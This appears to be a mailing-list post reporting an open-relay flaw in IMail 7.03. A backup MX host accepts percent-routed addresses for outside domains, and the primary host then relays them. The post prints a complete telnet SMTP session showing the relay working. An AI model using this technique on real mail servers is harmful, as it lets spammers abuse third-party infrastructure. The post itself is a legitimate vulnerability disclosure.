I don't know if this has been noted before, Imail 7.03 appears to have a
vulnerability allowing anyone to relay through a backup MX host. This
happens with the syntax: [EMAIL PROTECTED] where munged.com is
a local domain, and external.com is a domain we should not be relaying
for.
1) Primary and secondary MX hosts are both configured to relay for local
addresses only (Using "relay mail for [addresses]") under the SMTP
security tab.
2) Secondary MX host improperly accepts mail that should be rejected.
Primary MX host then relays due to inherent trust relationship between
the two.
3) Both are running latest 7.03
E.G., from an outside IP address if I do this:
$ telnet 10.10.10.1 25
Trying 10.10.10.1...
Connected to 10.10.10.1.
Escape character is '^]'.
220 X1 NT-ESMTP Server mail.munged.com (IMail 7.03 7-1)
ehlo me.outsidedomain.com
250-mail.munged.com says hello
250-SIZE 0
250-8BITMIME
250-DSN
250-ETRN
250 EXPN
mail from:<[EMAIL PROTECTED]>
250 ok
rcpt to:<[EMAIL PROTECTED]>
250 ok its for <[EMAIL PROTECTED]>
data
354 ok, send it; end with <CRLF>.<CRLF>
From: Me <[EMAIL PROTECTED]>
To: You <[EMAIL PROTECTED]>
Subject: relay test
this is BAD
.
250 Message queued
quit
221 Goodbye
Connection closed by foreign host.
-----------
me%external.com is on an outside host that we shouldn't be relaying for,
yet it is receiving this mail. As a result we've been listed in orbz.org
:(
Note that the primary server will reject [EMAIL PROTECTED] if
sent directly to it.
This sucks :(
Mike
Please visit http://www.ipswitch.com/support/mailing-lists.html
to be removed from this list.
An Archive of this list is available at:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
